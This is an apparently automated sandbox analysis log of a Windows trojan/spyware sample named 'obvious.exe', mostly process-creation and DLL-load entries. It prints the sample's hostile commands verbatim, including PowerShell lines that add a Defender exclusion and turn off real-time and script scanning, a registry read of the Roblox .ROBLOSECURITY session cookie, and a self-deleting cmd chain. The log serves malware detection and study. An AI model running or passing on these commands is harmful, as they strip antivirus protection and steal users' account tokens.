Source: obvious.exe, ----.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine Classification label: mal100.troj.adwa.spyw.evad.winEXE@39/23@3/2
Source: C:\Users\user\Desktop\obvious.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\obvious.exe.log Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8020:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3736:120:WilError_03
Source: C:\Users\user\Desktop\obvious.exe Mutant created: \Sessions\1\BaseNamedObjects\Ias6tBDXXaWYdVykfgAQ
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4280:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7868:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8140:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7780:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2568:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7856:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7736:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7640:120:WilError_03
Source: C:\Users\user\Desktop\obvious.exe File created: C:\Users\user\AppData\Local\Temp\hGQwf2dJC9byEfm Jump to behavior
Source: obvious.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: obvious.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\obvious.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: obvious.exe, 00000000.00000002.2327380876.0000012F61560000.00000004.00000800.00020000.00000000.sdmp, KtE6mRAFZ5iEcgF.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: obvious.exe ReversingLabs: Detection: 78%
Source: C:\Users\user\Desktop\obvious.exe File read: C:\Users\user\Desktop\obvious.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\obvious.exe "C:\Users\user\Desktop\obvious.exe"
Source: C:\Users\user\Desktop\obvious.exe Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid
Source: C:\Windows\System32\wbem\WMIC.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\obvious.exe Process created: C:\Windows\System32\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\obvious.exe"
Source: C:\Windows\System32\attrib.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\obvious.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\obvious.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\obvious.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\obvious.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\obvious.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\obvious.exe Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" os get Caption
Source: C:\Users\user\Desktop\obvious.exe Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" computersystem get totalphysicalmemory
Source: C:\Windows\System32\wbem\WMIC.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\obvious.exe Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid
Source: C:\Windows\System32\wbem\WMIC.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\obvious.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\obvious.exe Process created: C:\Windows\System32\wbem\WMIC.exe "wmic" path win32_VideoController get name
Source: C:\Windows\System32\wbem\WMIC.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\obvious.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\obvious.exe" && pause
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost
Source: C:\Users\user\Desktop\obvious.exe Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process created: C:\Windows\System32\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\obvious.exe" Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\obvious.exe' Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" os get Caption Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" computersystem get totalphysicalmemory Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process created: C:\Windows\System32\wbem\WMIC.exe "wmic" path win32_VideoController get name Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\obvious.exe" && pause Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping localhost
Source: C:\Users\user\Desktop\obvious.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Section loaded: devenum.dll Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Section loaded: devobj.dll Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Section loaded: msdmo.dll Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\obvious.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\attrib.exe Section loaded: ulib.dll Jump to behavior
Source: C:\Windows\System32\attrib.exe Section loaded: fsutilext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe Section loaded: amsi.dll
